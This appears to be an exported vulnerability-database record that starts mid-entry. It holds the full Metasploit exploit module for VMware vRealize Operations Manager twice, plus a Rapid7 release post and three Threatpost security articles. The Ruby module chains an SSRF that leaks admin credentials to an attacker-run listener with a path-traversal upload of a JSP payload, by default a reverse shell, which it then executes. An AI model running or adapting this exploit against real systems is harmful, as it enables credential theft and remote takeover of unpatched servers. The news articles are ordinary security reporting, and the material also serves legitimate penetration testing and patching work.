on_request_uri(cli, request)\n print_status(\"#{cli.peerhost} connected to SSRF server!\")\n vprint_line(request.to_s)\n\n @creds ||= request.headers['Authorization']\n ensure\n send_not_found(cli)\n close_client(cli)\n end\n\n def write_jsp_payload\n jsp_path = \"/usr/lib/vmware-casa/casa-webapp/webapps/casa/#{jsp_filename}\"\n\n print_status('Writing JSP payload')\n vprint_status(jsp_path)\n\n multipart_form = Rex::MIME::Message.new\n multipart_form.add_part(\n \"../../../../..#{jsp_path}\",\n nil, # Content-Type\n nil, # Content-Transfer-Encoding\n 'form-data; name=\"name\"'\n )\n multipart_form.add_part(\n payload.encoded,\n nil, # Content-Type\n nil, # Content-Transfer-Encoding\n %(form-data; name=\"file\"; filename=\"#{jsp_filename}\")\n )\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/casa/private/config/slice/ha/certificate'),\n 'authorization' => @creds,\n 'ctype' => \"multipart/form-data; boundary=#{multipart_form.bound}\",\n 'data' => multipart_form.to_s\n )\n\n unless res&.code == 200\n fail_with(Failure::NotVulnerable, 'Failed to write JSP payload')\n end\n\n register_file_for_cleanup(jsp_path)\n\n print_good('Successfully wrote JSP payload')\n end\n\n def execute_jsp_payload\n jsp_uri = normalize_uri(target_uri.path, 'casa', jsp_filename)\n\n print_status('Executing JSP payload')\n vprint_status(full_uri(jsp_uri))\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => jsp_uri,\n 'authorization' => @creds\n )\n\n unless res&.code == 200\n fail_with(Failure::PayloadFailed, 'Failed to execute JSP payload')\n end\n\n print_good('Successfully executed JSP payload')\n end\n\n def jsp_filename\n @jsp_filename ||= \"#{rand_text_alphanumeric(8..16)}.jsp\"\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/vmware_vrops_mgr_ssrf_rce.rb", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}], "packetstorm": [{"lastseen": "2021-04-27T15:49:39", "description": "", "published": "2021-04-27T00:00:00", "type": "packetstorm", "title": "VMware vRealize Operations Manager Server-Side Request Forgery / Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2021-21975", "CVE-2021-21983"], "modified": "2021-04-27T00:00:00", "id": "PACKETSTORM:162349", "href": "https://packetstormsecurity.com/files/162349/VMware-vRealize-Operations-Manager-Server-Side-Request-Forgery-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Remote::HttpServer \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'VMware vRealize Operations (vROps) Manager SSRF RCE', \n'Description' => %q{ \nThis module exploits a pre-auth SSRF (CVE-2021-21975) and post-auth \nfile write (CVE-2021-21983) in VMware vRealize Operations Manager to \nleak admin creds and write/execute a JSP payload. \n \nCVE-2021-21975 affects the /casa/nodes/thumbprints endpoint, and \nCVE-2021-21983 affects the /casa/private/config/slice/ha/certificate \nendpoint. Code execution occurs as the \"admin\" Unix user. \n \nThe following vRealize Operations Manager versions are vulnerable: \n \n* 7.0.0 \n* 7.5.0 \n* 8.0.0, 8.0.1 \n* 8.1.0, 8.1.1 \n* 8.2.0 \n* 8.3.0 \n \nVersion 8.3.0 is not exploitable for creds and is therefore not \nsupported by this module. Tested against 8.0.1. \n}, \n'Author' => [ \n'Egor Dimitrenko', # Discovery \n'wvu' # Analysis and exploit \n], \n'References' => [ \n['CVE', '2021-21975'], # SSRF \n['CVE', '2021-21983'], # File write \n['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0004.html'], \n['URL', 'https://twitter.com/ptswarm/status/1376961747232382976'], \n['URL', 'https://attackerkb.com/topics/51Vx3lNI7B/cve-2021-21975#rapid7-analysis'] \n], \n'DisclosureDate' => '2021-03-30', # Vendor advisory \n'License' => MSF_LICENSE, \n'Platform' => 'linux', \n'Arch' => ARCH_JAVA, \n'Privileged' => false, \n'Targets' => [ \n['vRealize Operations Manager < 8.3.0', {}] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'SRVPORT' => 8443, \n'SSL' => true, \n'PAYLOAD' => 'java/jsp_shell_reverse_tcp' \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [ \nIOC_IN_LOGS, # /usr/lib/vmware-casa/casa-webapp/logs \nARTIFACTS_ON_DISK # /usr/lib/vmware-casa/casa-webapp/webapps/casa \n] \n}, \n'Stance' => Stance::Aggressive \n) \n) \n \nregister_options([ \nOpt::RPORT(443), \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \nend \n \ndef setup \nsuper \n \n@creds = nil \n \nprint_status('Starting SSRF server...') \nstart_service \nend \n \ndef check \nleak_admin_creds ? CheckCode::Vulnerable : CheckCode::Safe \nend \n \ndef exploit \nreturn unless (@creds ||= leak_admin_creds) \n \nwrite_jsp_payload \nexecute_jsp_payload \nend \n \ndef leak_admin_creds \n# \"Comment out\" trailing path using URI fragment syntax, ostensibly \nssrf_uri = \"#{srvhost_addr}:#{srvport}#{get_resource}#\" \n \nprint_status('Leaking admin creds via SSRF...') \nvprint_status(ssrf_uri) \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/casa/nodes/thumbprints'), \n'ctype' => 'application/json', \n'data' => [ssrf_uri].to_json \n) \n \nunless res&.code == 200 && res.get_json_document.dig(0, 'address') == ssrf_uri \nprint_error('Failed to send SSRF request') \nreturn \nend \n \nunless @creds \nprint_error('Failed to leak admin creds') \nreturn \nend \n \nprint_good('Successfully leaked admin creds') \nvprint_status(\"Authorization: #{@creds}\") \n \n@creds \nend \n \ndef on_request_uri(cli, request) \nprint_status(\"#{cli.peerhost} connected to SSRF server!\") \nvprint_line(request.to_s) \n \n@creds ||= request.headers['Authorization'] \nensure \nsend_not_found(cli) \nclose_client(cli) \nend \n \ndef write_jsp_payload \njsp_path = \"/usr/lib/vmware-casa/casa-webapp/webapps/casa/#{jsp_filename}\" \n \nprint_status('Writing JSP payload') \nvprint_status(jsp_path) \n \nmultipart_form = Rex::MIME::Message.new \nmultipart_form.add_part( \n\"../../../../..#{jsp_path}\", \nnil, # Content-Type \nnil, # Content-Transfer-Encoding \n'form-data; name=\"name\"' \n) \nmultipart_form.add_part( \npayload.encoded, \nnil, # Content-Type \nnil, # Content-Transfer-Encoding \n%(form-data; name=\"file\"; filename=\"#{jsp_filename}\") \n) \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/casa/private/config/slice/ha/certificate'), \n'authorization' => @creds, \n'ctype' => \"multipart/form-data; boundary=#{multipart_form.bound}\", \n'data' => multipart_form.to_s \n) \n \nunless res&.code == 200 \nfail_with(Failure::NotVulnerable, 'Failed to write JSP payload') \nend \n \nregister_file_for_cleanup(jsp_path) \n \nprint_good('Successfully wrote JSP payload') \nend \n \ndef execute_jsp_payload \njsp_uri = normalize_uri(target_uri.path, 'casa', jsp_filename) \n \nprint_status('Executing JSP payload') \nvprint_status(full_uri(jsp_uri)) \n \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => jsp_uri, \n'authorization' => @creds \n) \n \nunless res&.code == 200 \nfail_with(Failure::PayloadFailed, 'Failed to execute JSP payload') \nend \n \nprint_good('Successfully executed JSP payload') \nend \n \ndef jsp_filename \n@jsp_filename ||= \"#{rand_text_alphanumeric(8..16)}.jsp\" \nend \n \nend \n`\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/162349/vmware_vrops_mgr_ssrf_rce.rb.txt"}], "rapid7blog": [{"lastseen": "2021-04-30T18:51:30", "bulletinFamily": "info", "cvelist": ["CVE-2020-11857", "CVE-2020-8539", "CVE-2021-21975", "CVE-2021-21983", "CVE-2021-25646"], "description": "## Operations shell\n\n\n\nOperations and management software make popular targets due to their users typically having elevated privileges across a network. Our own [wvu](<https://github.com/wvu-r7>) contributed the [VMware vRealize Operations (vROps) Manager SSRF RCE](<https://github.com/rapid7/metasploit-framework/pull/15005>) exploit module for the vulnerabilities discovered by security researcher Egor Dimitrenko. The `exploit/linux/http/vmware_vrops_mgr_ssrf_rce` module achieves remote code execution (RCE) as the `admin` Unix user by chaining the two vulnerabilities. First, [CVE-2021-21975](<https://attackerkb.com/topics/51Vx3lNI7B/cve-2021-21975?referrer=blog#rapid7-analysis>) pre-authentication server-side request forgery (SSRF) vulnerability is exploited in the `/casa/nodes/thumbprints` endpoint to obtain the admin credentials. Then, the credentials are used to authenticate to the vRealize Operations Manager API and exploit [CVE-2021-21983](<https://attackerkb.com/topics/uzsEZjT0Sc/cve-2021-21983?referrer=blog>) via the `/casa/private/config/slice/ha/certificate` endpoint. This allows the module to write and execute an arbitrary file, a JSP payload in this case. The module should work against the following vulnerable versions:\n\n * 7.0.0\n * 7.5.0\n * 8.0.0, 8.0.1\n * 8.1.0, 8.1.1\n * 8.2.0\n\n## Data rules everything around me\n\nMany dynamic websites and business applications have associated databases, therefore databases are commonplace on networks. Odds are you frequently encounter more than one database on an engagement. The release this week includes two new database related modules!\n\nThe first, an [Apache Druid RCE](<https://github.com/rapid7/metasploit-framework/pull/14977>) exploit module for a vulnerability in versions 0.20.0 and older. The vulnerability [CVE-2021-25646](<https://attackerkb.com/topics/lOVKwIVWHg/cve-2021-25646?referrer=blog>) was discovered by Litch1, and [je5442804](<https://github.com/je5442804>) contributed the module. The second, a gather module named [Redis Extractor](<https://github.com/rapid7/metasploit-framework/pull/14702>) contributed by [Geoff Rainville (noncenz)](<https://github.com/noncenz>) enables easy looting of any key-value stores you discover.\n\n## New Module Content (5)\n\n * [Redis Extractor](<https://github.com/rapid7/metasploit-framework/pull/14702>) by Geoff Rainville noncenz - Adds a module to retrieve all data from a Redis instance (version 2.8.0 and above).\n * [Apache Druid 0.20.0 Remote Command Execution](<https://github.com/rapid7/metasploit-framework/pull/14977>) by Litch1, Security Team of Alibaba Cloud and je5442804, which exploits [CVE-2021-25646](<https://attackerkb.com/topics/lOVKwIVWHg/cve-2021-25646?referrer=blog>) \\- This adds an exploit module that targets Apache Druid versions prior to `0.20.1`. An authenticated user can send a single request that both enables the execution of user-provided JavaScript code and executes the code on the server with the privileges of the user running the Apache Druid process. By default, Apache Druid does not require authentication.\n * [VMware vRealize Operations (vROps) Manager SSRF RCE](<https://github.com/rapid7/metasploit-framework/pull/15005>) by wvu and Egor Dimitrenko, which exploits [CVE-2021-21983](<https://attackerkb.com/topics/uzsEZjT0Sc/cve-2021-21983?referrer=blog>) \\- This adds a module that exploits both a pre-auth SSRF and a post-auth file write via directory traversal to get code execution as the `admin` user on vulnerable VMware vRealize Operations Manager installs.\n * [Micro Focus Operations Bridge Reporter shrboadmin default password](<https://github.com/rapid7/metasploit-framework/pull/15086>) by Pedro Ribeiro, which exploits ZDI-20-1215 - This adds an exploit for [CVE-2020-11857](<https://attackerkb.com/topics/0rBqrv2UNX/cve-2020-11857?referrer=blog>) which is a hardcoded SSH password in Micro Focus Operations Bridge Manager instances.\n * [KOFFEE - Kia OFFensivE Exploit](<https://github.com/rapid7/metasploit-framework/pull/15021>) by Gianpiero Costantino and Ilaria Matteucci, which exploits [CVE-2020-8539](<https://attackerkb.com/topics/zXxJ29z090/cve-2020-8539?referrer=blog>) \\- This adds a post module that leverages the CVE-2020-8539 vulnerability on certain Kia Motors head units. This vulnerability is also known as KOFFEE.\n\n## Enhancements and features\n\n * [#11257](<https://github.com/rapid7/metasploit-framework/pull/11257>) from [sempervictus](<https://github.com/sempervictus>) \\- This PR adds the ability to wrap some powershell used for exploitation purposes with RC4 for obfuscation.\n * [#15014](<https://github.com/rapid7/metasploit-framework/pull/15014>) from [ctravis-r7](<https://github.com/ctravis-r7>) \\- Adds the ability to specify an individual private key as a string parameter into the `auxiliary/scanner/ssh/ssh_login_pubkey` module.\n * [#15110](<https://github.com/rapid7/metasploit-framework/pull/15110>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This adds the necessary functionality to the Java Meterpreter to resolve hostnames over DNS, closing a feature gap that had been present with other Meterpreters.\n\n## Bugs Fixed\n\n * [#14953](<https://github.com/rapid7/metasploit-framework/pull/14953>) from [bwatters-r7](<https://github.com/bwatters-r7>) \\- Fix the python 3.6 string formatting syntax in modules/auxiliary/scanner/http/rdp_web_login\n * [#15050](<https://github.com/rapid7/metasploit-framework/pull/15050>) from [cgranleese-r7](<https://github.com/cgranleese-r7>) \\- Fixes a crash in Metasploit's console when the user tried to tab complete values such as file paths that were missing their final ending quote\n * [#15081](<https://github.com/rapid7/metasploit-framework/pull/15081>) from [cgranleese-r7](<https://github.com/cgranleese-r7>) \\- Updates the Microsoft SQL Server interesting data finder module to correctly handle the scenario where no interesting data is found. Previously this would result in a module crash.\n * [#15094](<https://github.com/rapid7/metasploit-framework/pull/15094>) from [timwr](<https://github.com/timwr>) \\- This fixed a bug in how certain Meterpreter's would execute command issued through `sessions -c` where some would use a subshell while others would not.\n * [#15114](<https://github.com/rapid7/metasploit-framework/pull/15114>) from [smashery](<https://github.com/smashery>) \\- Updates the `auxiliary/scanner/redis/file_upload` module to correctly handle Redis instances that require authenticated access\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.0.41...6.0.42](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-04-22T13%3A32%3A25%2B10%3A00..2021-04-29T10%3A54%3A48-05%3A00%22>)\n * [Full diff 6.0.41...6.0.42](<https://github.com/rapid7/metasploit-framework/compare/6.0.41...6.0.42>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "modified": "2021-04-30T17:42:19", "published": "2021-04-30T17:42:19", "id": "RAPID7BLOG:B7FE1EAED2C3AB6161A7ADCBD8A34ADF", "href": "https://blog.rapid7.com/2021/04/30/metasploit-wrap-up-109/", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2021-04-07T16:47:09", "bulletinFamily": "info", "cvelist": ["CVE-2021-21982"], "description": "Smart cybercriminals are going after web servers and browsers, more so than after individuals. Unfortunately, these types of attacks often go ignored, as they\u2019re harder to test for (in terms of pen-testing).\n\nWith much of the world now working remotely, this threat has intensified. Attackers use email, instant messages, SMS messages and links on social networking to trick at-home workers into installing malware that leads to identity theft, loss of property and, possibly, entry into the corporate network. Phishing attacks may lead users to fake sites or landing pages, with the same intent.\n\nWhat are the latest risks organizations are facing, and what can be done now to defend against them?\n\n## **Web-Based Phishing On the Rise**\n\nThe cybersecurity industry is seeing a significant spike in web-based phishing, starting with the HTML/phishing cyber-threat family. Similar HTML cousins \u2013 /ScrInject (browser script injection attacks) and /REDIR (browser redirection schemes) \u2013 have also contributed to the increase in phishing attempts in 2020. Web-based malware tends to override or bypass most common antivirus (AV) programs, giving it a greater chance of survival and successful infection.\n\nThis reveals a strong interest from cybercriminals in attacking users where they are often most vulnerable and gullible: browsing the web. The combination of remote work and online shopping expand this threat significantly. Black Friday shoppers last year spent a record-shattering [$9 billion](<https://abcnews.go.com/Business/black-friday-hits-record-report/story?id=74435965>), for instance. With the COVID-19 risk of in-person shopping, 2020\u2019s Cyber Monday was reportedly the largest online sales day ever. Web-based malware can obscure and/or bypass traditional AV products, upping the chance of successful infection.\n\n## **Browsers: A Key Delivery Vector for Malware **\n\nBrowsers are not easy to secure, and web applications can be challenging to monitor. These are some of the reasons why the browser has become a key delivery vector for malware over the last year, and this trend will likely continue for the next year. This corresponds to the documented drop in corporate web traffic, which was generally inspected and sanitized, and the rise in home-based web traffic due to the shift to remote work.\n\nThis shift reinforces the point that cybercriminals have intentionally changed their attack methodologies to target the traffic that is now flooding lesser-secured networks. Malware trends reflect attackers\u2019 intentions and capabilities. Similar to intrusion-prevention system (IPS) detections, malware picked up by security sensors does not always indicate confirmed infections, but rather the weaponization and/or distribution of malicious code. Detections can occur at the network, application and host level on many different devices.\n\n## **What Cybersecurity Actions Should I Take Now?**\n\nThere are three things that organizations need to consider when it comes to their cybersecurity strategy:\n\n 1. **Cyber-hygiene is key:** Organizations must provide remote workers with the knowledge and training necessary to secure their own personal networks and the connected business network. This involves training but also guidance on software updates.\n 2. **Organizations can\u2019t rely on employees\u2019 personal security:** They must also provide additional resources, such as endpoint detection-and-response (EDR) solutions that can detect and stop advanced threats. Organizations need advanced, real-time threat protection for endpoints both pre- and post-infection.\n 3. **Effective cybersecurity necessitates continuous vigilance and adaptability to changing threat strategies:** Though security should have been a top priority all along, now may be the time to consider investing in broader, more advanced, adaptable, and integrated solutions \u2013 particularly as cybercriminals modify their attack methods to use personal devices as a springboard to enterprise networks. With this in mind, fortifying remote systems and networks should top the security to-do list.\n\n## **Staying Well-Equipped**\n\nThe threat landscape shifts constantly, requiring security pros to keep on top of new threat types and vectors. Savvy defenders should note that the browser was a prime delivery vector for malware in 2020 \u2013 and is likely to be again this year \u2013 and act accordingly to ensure consistent controls for remote systems. Regardless of the state of the world around us, the best way to protect against ever-evolving malicious activity is to take a comprehensive, integrated approach to cybersecurity.\n\nVital components of this approach include continuous access to up-to-date threat intelligence and cybersecurity training for all employees, particularly those who work remotely. It\u2019s also essential to use updated security technology, such as EDR, which detects and halts advanced threats in real time. All the intelligence in the world won\u2019t do an organization any good if its security tools aren\u2019t capable of using it to find and mitigate attacks. Make sure all of these tactics are part of your comprehensive security strategy.\n\n**_Aamir Lakhani is a cybersecurity researcher and practitioner for Fortinet\u2019s FortiGuard Labs. _**\n\n_**Enjoy additional insights from Threatpost\u2019s InfoSec Insider community by **_[**_visiting our microsite_**](<https://threatpost.com/microsite/infosec-insiders-community/>)_**.**_\n", "modified": "2021-04-05T17:28:13", "published": "2021-04-05T17:28:13", "id": "THREATPOST:6C1025257B798335D913F95B63229B76", "href": "https://threatpost.com/how-to-defend-the-extended-network-against-web-risks/165236/", "type": "threatpost", "title": "How To Defend the Extended Network Against Web Risks", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2021-04-07T21:03:22", "bulletinFamily": "info", "cvelist": ["CVE-2021-21982"], "description": "A critical security vulnerability in the VMware Carbon Black Cloud Workload appliance would allow privilege escalation and the ability to take over the administrative rights for the solution.\n\nThe bug (CVE-2021-21982) ranks 9.1 out of 10 on the CVSS vulnerability-severity scale.\n\nThe VMware Carbon Black Cloud Workload platform is designed to provide cybersecurity defense for virtual servers and workloads that are hosted on the VMware\u2019s vSphere platform. vSphere is VMware\u2019s cloud-computing virtualization platform.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe issue in the appliance stems from incorrect URL handling, according to VMware\u2019s advisory issued last week.\n\n\u201cA URL on the administrative interface of the VMware Carbon Black Cloud Workload appliance can be manipulated to bypass authentication,\u201d the company noted. \u201cAn adversary who has already gained network access to the administrative interface of the appliance may be able to obtain a valid authentication token.\u201d\n\nThat in turn would allow the attacker to access the administration API of the appliance. Once signed in as an admin, the attacker could then view and alter administrative [configuration settings](<https://docs.vmware.com/en/VMware-Carbon-Black-Cloud-Workload/1.0/carbonblack_workload/GUID-E2ED3713-315B-4EEE-A3E8-A7A09A011101.html>). Depending on what tools an organization has deployed within the environment, an adversary could carry out a range of attacks, including code execution, disabling security monitoring, enumerating virtual instances within a private cloud and more.\n\n\u201cA remote attacker could exploit this vulnerability to take control of an affected system,\u201d said the Cybersecurity and Infrastructure Agency (CISA) in a [concurrent alert](<https://us-cert.cisa.gov/ncas/current-activity/2021/04/02/vmware-releases-security-update>) on the bug.\n\nCompanies are urged to update to the latest version, [version 1.0.2](<https://docs.vmware.com/en/VMware-Carbon-Black-Cloud-Workload/1.0/rn/cbc-workload-102-release-notes.html>), of the VMware Carbon Black Cloud Workload appliance, which contains a fix.\n\nUsers should also limit access to the local administrative interface of the appliance to only those that need it, VMware recommended.\n\nEgor Dimitrenko of Positive Technologies was credited with discovering the vulnerability.\n\nThe security hole is only the latest critical problem that VMware has addressed. In February for instance, VMware [patched three vulnerabilities](<https://threatpost.com/vmware-patches-critical-rce-flaw-in-vcenter-server/164240/>) in its virtual-machine infrastructure for data centers, including a remote code execution (RCE) flaw in its vCenter Server management platform. The vulnerability could allow attackers to breach the external perimeter of an enterprise data center or leverage backdoors already installed on a system, to find other vulnerable points of network entry to take over affected systems.\n\n**_Ever wonder what goes on in underground cybercrime forums? Find out on April 21 at 2 p.m. ET during a _****_[FREE Threatpost event](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)_****_, \u201cUnderground Markets: A Tour of the Dark Economy.\u201d Experts will take you on a guided tour of the Dark Web, including what\u2019s for sale, how much it costs, how hackers work together and the latest tools available for hackers. _****_[Register here](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)_****_ for the Wed., April 21 LIVE event. _**\n\n**_ _**\n", "modified": "2021-04-06T20:55:47", "published": "2021-04-06T20:55:47", "id": "THREATPOST:98B57FBF6D83FA4D12BEE06C0281FF91", "href": "https://threatpost.com/critical-cloud-bug-vmware-carbon-black/165278/", "type": "threatpost", "title": "Critical Bug in VMWare Carbon Black Allows Takeover", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2021-04-07T16:39:22", "bulletinFamily": "info", "cvelist": ["CVE-2020-9922", "CVE-2021-21982"], "description": "A zero-click security vulnerability in Apple\u2019s macOS Mail would allow a cyberattacker to add or modify any arbitrary file inside Mail\u2019s sandbox environment, leading to a range of attack types.\n\nAccording to Mikko Kentt\u00e4l\u00e4, founder and CEO of SensorFu, exploitation of the bug could lead to unauthorized disclosure of sensitive information to a third party; the ability to modify a victim\u2019s Mail configuration, including mail redirects which enables takeover of victim\u2019s other accounts via password resets; and the ability to change the victim\u2019s configuration so that the attack can propagate to correspondents in a worm-like fashion.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThough the researcher is just now making the bug\u2019s [details available](<https://mikko-kenttala.medium.com/zero-click-vulnerability-in-apples-macos-mail-59e0c14b106c>), it was patched in macOS Mojave 10.14.6, macOS High Sierra 10.13.6, macOS Catalina 10.15.5, so users should update accordingly.\n\n## **Unauthorized Write Access**\n\nKentt\u00e4l\u00e4 said he discovered the bug ([CVE-2020-9922](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9922>)) by sending test messages and following Mail process syscalls.\n\nHe found that \u201cmail has a feature which enables it to automatically uncompress attachments which have been automatically compressed by another Mail user,\u201d he explained. \u201cIn the valid use case, if the user creates email and adds the folder as an attachment it will be automatically compressed with ZIP and x-mac-auto-archive=yes; is added to the MIME headers. When another Mail user receives this email, compressed attachment data is automatically uncompressed.\u201d\n\nHowever, the researcher discovered that parts of the uncompressed data are not removed from the temporary directory \u2013 and that the directory serves multiple functions, allowing attackers to pivot within the environment.\n\n\u201c[It] is not unique in context of Mail, this can be leveraged to get unauthorized write access to ~/Library/Mail and to $TMPDIR using symlinks inside of those zipped files,\u201d Kentt\u00e4l\u00e4 explained.\n\n## **Zero-Click Attack Path**\n\nTo exploit the bug, a cyberattacker could email two .ZIP files as attachments to the victim, according to the analysis. When a user receives the email, the Mail app will parse it to find any attachments with x-mac-auto-archive=yes header in place. Mail will then automatically unpack those files.\n\n\u201cThe first .ZIP includes a symlink named Mail which points to victims\u2019 $HOME/Library/Mail and file 1.txt,\u201d said Kentt\u00e4l\u00e4. \u201cThe .ZIP gets uncompressed to $TMPDIR/com.apple.mail/bom/. Based on the filename=1.txt.zip header, 1.txt gets copied to the mail director and everything works as expected. However, cleanup is not done right way and the symlink is left in place.\u201d\n\nThis left-behind symlink anchors the second stage of the attack.\n\n\u201cThe second attached .ZIP includes the changes that you want to do to $HOME/Library/Mail. This will provide arbitrary file write permission to Library/Mail,\u201d the researcher explained. \u201cIn my example case I wrote new Mail rules for the Mail application. With that you can add an auto forward rule to the victim\u2019s Mail application.\u201d\n\nThis arbitrary write access means that an attacker can manipulate all of the files in $HOME/Library/Mail, he added.\n\nCVE-2020-9922 is rated 6.5 on the CVSS vulnerability-severity scale, making it medium-severity, but the researcher stressed that successful exploitation could \u201clead to many bad things.\u201d\n\n\u201cAs shown, this will lead to exposure of the sensitive data to a third party through manipulating the Mail application\u2019s configuration,\u201d he said. \u201cOne of the available configuration options is the user\u2019s signature which could be used to make this vulnerability wormable. There is also a chance that this could lead to a remote code-execution (RCE) vulnerability, but I didn\u2019t go that far.\u201d\n\n**_Check out our free _**[**_upcoming live webinar events_**](<https://threatpost.com/category/webinars/>)**_ \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community:_**\n\n * April 21: **Underground Markets: A Tour of the Dark Economy** ([Learn more and register!](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>))\n\n** **\n", "modified": "2021-04-05T19:10:53", "published": "2021-04-05T19:10:53", "id": "THREATPOST:E3FA0D5BB017B7DD39D5924D32A9A668", "href": "https://threatpost.com/apple-mail-zero-click-security-vulnerability/165238/", "type": "threatpost", "title": "Apple Mail Zero-Click Security Vulnerability Allows Email Snooping", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}]}